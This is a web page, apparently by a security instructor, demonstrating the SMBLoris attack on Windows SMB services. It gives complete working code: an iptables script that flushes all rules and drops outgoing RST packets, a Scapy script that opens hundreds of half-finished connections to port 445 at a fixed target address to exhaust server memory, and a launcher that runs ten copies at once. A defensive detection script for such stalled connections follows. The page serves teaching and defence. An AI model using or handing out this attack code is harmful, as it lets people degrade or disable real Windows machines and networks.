SMBLoris Attack

This attack consumes resources on a Windows target and slows it down. I've even permanently broken two of my test virtual machines, so they cannot make any network connections.

Here's a video showing the attack:

Code

Here is the code I used in the video above. There are three files. They all run on Kali 2 with no added software.

rst

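This script adjusts the firewall to block outgoing RST packets. The OS would otherwise send them, because its own TCP stack has no record of the connections that Scapy opens with raw packets. Note that iptables -F flushes all existing rules before the DROP rule is added.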
#!/bin/bash

iptables -F
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

smb3.py

This script makes 700 connections to port 445, adding these four bytes to the payload of the final ACK:
'\x00\x01\xff\xff'
Those bytes begin an SMB request, causing the server to reserve 128 KB of RAM. The request is never completed, so RAM is wasted on the server.
from scapy.all import *
import sys

p0 = int(sys.argv[1])

conf.L3socket
conf.L3socket=L3RawSocket

i = IP()
i.dst = "172.16.1.186"
t = TCP()
t.dport = 445

for p in range(p0, p0+700):
  print p
  t.sport = p
  t.flags = "S"

  r = sr1(i/t)
  rt = r[TCP]
  t.ack = rt.seq + 1
  t.seq = rt.ack
  t.flags = "A"
  sbss = '\x00\x01\xff\xff'
  send(i/t/sbss)

run10

This script runs 10 copies of smb3.py in the background, each with a different starting source port, to make the attack faster.
#!/bin/bash
python smb3.py 0 &
python smb3.py 1000 &
python smb3.py 2000 &
python smb3.py 3000 &
python smb3.py 4000 &
python smb3.py 5000 &
python smb3.py 6000 &
python smb3.py 7000 &
python smb3.py 8000 &
python smb3.py 9000 &
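
From the defender's side, the pattern above is many idle connections to port 445 that each announced a large message and then sent nothing. The following is an added example, not code from the original page: it decodes the four-byte header and flags sources holding many such connections. The record layout, thresholds, and sample addresses are assumptions made for illustration.

```python
import struct
from collections import defaultdict

def declared_length(header: bytes) -> int:
    """Decode the 4-byte prefix of an SMB message on TCP 445:
    one zero byte, then a 3-byte big-endian message length."""
    if len(header) != 4 or header[0] != 0:
        raise ValueError("not an SMB session-message header")
    return struct.unpack(">I", header)[0]  # top byte is 0, so this is the length

def find_stalled(conns, min_conns=100, min_idle_s=30):
    """Return {src_ip: (stalled_connections, bytes_announced)} for sources
    holding many idle connections whose announced message never arrived."""
    per_src = defaultdict(lambda: [0, 0])
    for c in conns:
        try:
            want = declared_length(c["header"])
        except ValueError:
            continue  # not SMB framing; out of scope for this check
        if c["body_bytes"] < want and c["idle_s"] >= min_idle_s:
            per_src[c["src"]][0] += 1
            per_src[c["src"]][1] += want
    return {ip: tuple(v) for ip, v in per_src.items() if v[0] >= min_conns}

# Constructed sample records (not captured traffic). The hypothetical fields are:
# src, sport, header (first 4 payload bytes), body_bytes received after the
# header, and idle_s since the last segment.
SAMPLE = [{"src": "192.0.2.10", "sport": p, "header": b"\x00\x01\xff\xff",
           "body_bytes": 0, "idle_s": 120} for p in range(1000, 1700)]
# One ordinary client that sent its complete 155-byte message.
SAMPLE.append({"src": "192.0.2.20", "sport": 50123, "header": b"\x00\x00\x00\x9b",
               "body_bytes": 155, "idle_s": 2})

if __name__ == "__main__":
    print(declared_length(b"\x00\x01\xff\xff"))
    for ip, (n, total) in find_stalled(SAMPLE).items():
        print(f"{ip}: {n} stalled connections announcing {total} bytes")
```

The header bytes decode to 131071, one byte short of 128 KB, which matches the per-connection reservation described above.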

Original Tweets

These are the Tweets that explain how the attack works.

Read from bottom to top.


Posted 7-31-17 by Sam Bowne
Revised with code and video 8-2-17